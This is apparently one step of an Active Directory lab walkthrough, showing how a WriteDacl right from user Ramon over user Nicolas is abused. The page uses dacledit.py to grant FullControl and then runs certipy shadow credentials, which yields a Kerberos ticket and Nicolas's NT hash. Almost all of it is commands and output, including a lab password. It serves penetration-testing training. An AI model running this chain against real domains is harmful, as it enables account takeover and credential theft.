WriteDacl on User (Ramon-> Nicolas)

WriteDacl on User (Ramon-> Nicolas)

  • To exploit writeDacl from Ramon to Nicolas we can use acledit.py

  • First we will clone the impacket’s fork created by shutdown (@_nwodtuhs) to get the last PR with dacledit

git clone https://github.com/ThePorgs/impacket.git
cd impacket 
sudo python3 setup.py install

  • Now we can use dacledit.py

  • First let’s look at Ramon’s right on Nicolas:

dacledit.py -action 'read' -principal Ramon.Maldonado -target 'nicolas.Maduro' 'NewYork.local'/'Ramon.Maldonado':'monkey'

  • Ok now change the permission to “FullControl” and see the modification

dacledit.py -action 'write' -rights 'FullControl' -principal Ramon.Maldonado -target 'Nicolas.Maduro' 'NewYork.local'/'Ramon.Maldonado':'monkey'

See Modification

dacledit.py -action 'read' -principal Ramon.Maldonado -target 'nicolas.Maduro' 'NewYork.local'/'Ramon.Maldonado':'monkey'

  • Ok now we can :

    • change Nicolas password

    • do a target kerberoasting

    • do a shadow credentials

  • Let’s just use shadowcredentials :

certipy shadow auto -u Ramon.Maldonado@newyork.local -p 'monkey' -account 'Nicolas.Maduro'

Certipy v4.3.0 - by Oliver Lyak (ly4k)

[*] Targeting user 'nicolas.Maduro'
[*] Generating certificate
[*] Certificate generated
[*] Generating Key Credential
[*] Key Credential generated with DeviceID '9943db05-a20e-bd91-5731-8e4ca58eacf6'
[*] Adding Key Credential with device ID '9943db05-a20e-bd91-5731-8e4ca58eacf6' to the Key Credentials for 'nicolas.Maduro'
[*] Successfully added Key Credential with device ID '9943db05-a20e-bd91-5731-8e4ca58eacf6' to the Key Credentials for 'nicolas.Maduro'
[*] Authenticating as 'nicolas.Maduro' with the certificate
[*] Using principal: nicolas.maduro@newyork.local
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'nicolas.maduro.ccache'
[*] Trying to retrieve NT hash for 'nicolas.maduro'
[*] Restoring the old Key Credentials for 'nicolas.Maduro'
[*] Successfully restored the old Key Credentials for 'nicolas.Maduro'
[*] NT hash for 'nicolas.Maduro': b3b3717f7d51b37fb325f7e7d048e998
PreviousGenericWrite on User (Hugo -> Ramon)NextAdd self on Group (Nicolas-> RadioCity)

Last updated